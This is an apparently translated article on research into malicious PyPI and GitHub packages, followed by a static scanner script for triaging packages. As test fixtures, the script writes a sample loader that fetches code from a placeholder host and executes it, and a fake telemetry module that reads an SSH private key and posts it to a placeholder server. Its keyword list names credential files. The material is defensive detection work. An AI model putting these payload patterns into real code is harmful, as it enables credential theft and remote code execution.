Python's Double Life: How Versatility Turns into a Hidden Threat

Carding

It turns out that the PyPI and GitHub repositories hold more than a few unpleasant surprises.

Python is considered one of the most flexible programming languages, and its compatibility with a wide range of platforms and technologies makes it especially popular. Those same qualities, however, can turn against the developer. What exactly is the threat?

Researchers from China and Singapore studied the PyPI ecosystem (the Python Package Index, Python's main package repository) and found that dangerous malicious code is being distributed through it. By examining 1,556 malicious packages and 549 randomly selected benign ones, they were able to characterize the mechanisms the malicious packages use and their likely goals.

GitHub has the same problem, but the malicious code is buried differently. In PyPI packages an average of 2 malicious files were found, located no deeper than the third directory level; in GitHub projects the average was 23 malicious files, at depths of up to 17 directories.

That does not make suspicious PyPI packages any less of a threat. In 43% of the analyzed packages, 90% or more of the code consisted of a well-disguised malicious module.

Such packages are usually smaller, or at first glance appear to contain fewer malicious elements, because the most dangerous parts of the code are only downloaded after the package has started running.

The most common technique used by the attackers was the execution of arbitrary commands, present in more than 59% of the studied packages. The next most common behaviours were data theft and file modification.

Louis Lang, chief technology officer of the startup Phylum, commented on the topic on HackerNews. He expects cybersecurity experts and malware authors to remain in a constant "arms race" for the foreseeable future: as detection methods improve, attackers will most likely change their tactics as well.

Almost all large companies have powerful cyber defense tooling and hire the best experts in the field. Developers who want to try out a new library, however, should first test it in an isolated, secure environment, such as a throwaway virtual environment or container, and read the package's source, including its setup.py, before importing it.
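The behaviours listed above (arbitrary command execution, credential theft, file modification, payloads staged at run time) can be triaged statically before a package is ever installed or imported, which is the kind of check the isolated-environment advice calls for. The script below is an added example written for this post; it is not code from the post, from Phylum, or from the study it summarizes. It parses every .py file of an unpacked distribution with the standard `ast` module, never executing any of it, and rolls the hits up into package-level reasons to reject or review. The call list, the credential-hint strings, the roll-up rules and the constructed sample package (with a staged loader buried two directories down and a "telemetry" module that reads ~/.ssh/id_rsa) are all my own assumptions for the demonstration.

```python
import ast
import base64
import os
import tempfile
from collections import namedtuple

# Call targets mapped to behaviour categories; an assumed heuristic list, not the study's taxonomy.
SUSPICIOUS_CALLS = {
    "exec": "command-execution", "eval": "command-execution", "os.system": "command-execution",
    "subprocess.run": "command-execution", "subprocess.Popen": "command-execution",
    "urllib.request.urlopen": "network", "requests.get": "network", "requests.post": "network",
    "base64.b64decode": "obfuscation", "shutil.rmtree": "file-modification", "os.remove": "file-modification",
}
SENSITIVE_STRINGS = (".ssh", ".aws", "id_rsa", "credentials", ".pypirc")  # assumed credential hints
# path is '/'-separated and relative to the package root; depth is the number of directories below it.
Finding = namedtuple("Finding", "path depth lineno category detail")

def _qualname(node):
    """Dotted name for Name/Attribute chains such as os.system, else None."""
    parts = []
    while isinstance(node, ast.Attribute):
        parts.append(node.attr)
        node = node.value
    if isinstance(node, ast.Name):
        return ".".join(reversed(parts + [node.id]))
    return None

def scan_source(path, source, depth):
    """Findings for one file. Only ast.parse is used; nothing is imported or executed."""
    try:
        tree = ast.parse(source)
    except SyntaxError as exc:
        return [Finding(path, depth, exc.lineno or 0, "unparseable", "review by hand")]
    found = []
    for node in ast.walk(tree):
        name = _qualname(node.func) if isinstance(node, ast.Call) else None
        if name in SUSPICIOUS_CALLS:
            found.append(Finding(path, depth, node.lineno, SUSPICIOUS_CALLS[name], name))
        elif isinstance(node, ast.Constant) and isinstance(node.value, str):
            hit = next((s for s in SENSITIVE_STRINGS if s in node.value), None)
            if hit:
                found.append(Finding(path, depth, node.lineno, "data-theft", f"mentions {hit!r}"))
    return found

def scan_tree(root):
    """Walk an unpacked sdist or checkout; return (sorted findings, number of .py files)."""
    findings, total = [], 0
    for dirpath, _, names in os.walk(root):
        for name in names:
            if name.endswith(".py"):
                total += 1
                full = os.path.join(dirpath, name)
                rel = os.path.relpath(full, root).replace(os.sep, "/")
                with open(full, encoding="utf-8", errors="replace") as fh:
                    findings.extend(scan_source(rel, fh.read(), rel.count("/")))
    return sorted(findings, key=lambda f: (f.path, f.lineno)), total

def verdict(findings):
    """Roll per-call findings up to package-level reasons to reject or review."""
    cats = {}
    for f in findings:
        cats.setdefault(f.path, set()).add(f.category)
    reasons = []
    for path, c in cats.items():
        if path == "setup.py" and c & {"command-execution", "network"}:
            reasons.append(f"{path}: runs commands or reaches the network at install time")
        if {"network", "command-execution"} <= c:
            reasons.append(f"{path}: fetches remote content and executes it (staged payload)")
        if {"network", "data-theft"} <= c:
            reasons.append(f"{path}: touches credential material and has network access")
    return reasons

def build_sample_package(root):
    """Write a constructed package tree for the demo; it is not a real PyPI package."""
    stage_url = base64.b64encode(b"http://example.invalid/stage2").decode()
    files = {
        "setup.py": "from setuptools import setup\nsetup(name='demo-pkg', version='0.1', packages=['demo'])\n",
        "demo/core.py": "def add(a, b):\n    return a + b\n",  # benign, should yield no findings
        # Staged loader two directories down: the real payload only arrives at run time.
        "demo/utils/_compat.py": "import base64, urllib.request\n"
                                 f"_u = base64.b64decode(b'{stage_url}').decode()\n"
                                 "exec(urllib.request.urlopen(_u).read())\n",
        # Credential theft dressed up as telemetry.
        "demo/utils/telemetry.py": "import os, urllib.request\ndef report():\n"
                                   "    key = open(os.path.expanduser('~/.ssh/id_rsa')).read()\n"
                                   "    urllib.request.urlopen('http://example.invalid/c2', data=key.encode())\n",
    }
    for rel, src in files.items():
        full = os.path.join(root, *rel.split("/"))
        os.makedirs(os.path.dirname(full), exist_ok=True)
        with open(full, "w", encoding="utf-8") as fh:
            fh.write(src)

def run_demo():
    """Build the sample tree, scan it and return a summary dict for inspection or testing."""
    with tempfile.TemporaryDirectory() as tmp:
        build_sample_package(tmp)
        findings, total = scan_tree(tmp)
    return {"total_files": total, "findings": findings,
            "flagged_files": sorted({f.path for f in findings}),
            "max_depth": max((f.depth for f in findings), default=0),
            "reasons": verdict(findings)}

if __name__ == "__main__":
    for f in run_demo()["findings"]:
        print(f"{f.path}:{f.lineno} depth={f.depth} [{f.category}] {f.detail}")
```

Running the script lists every hit with the directory depth it was found at; on the sample tree the benign files produce nothing, while both files under demo/utils are flagged and `verdict()` returns one "staged payload" and one "credential material" reason. To triage a real package, unpack the sdist or wheel into a directory (without installing it) and call `scan_tree()` on that directory. The heuristics are deliberately simple: a package that builds call names from string fragments or uses `getattr` chains will slip past `_qualname`, which is exactly the kind of tactic change the arms-race comment above anticipates, so treat a clean result as "nothing obvious", not as "safe".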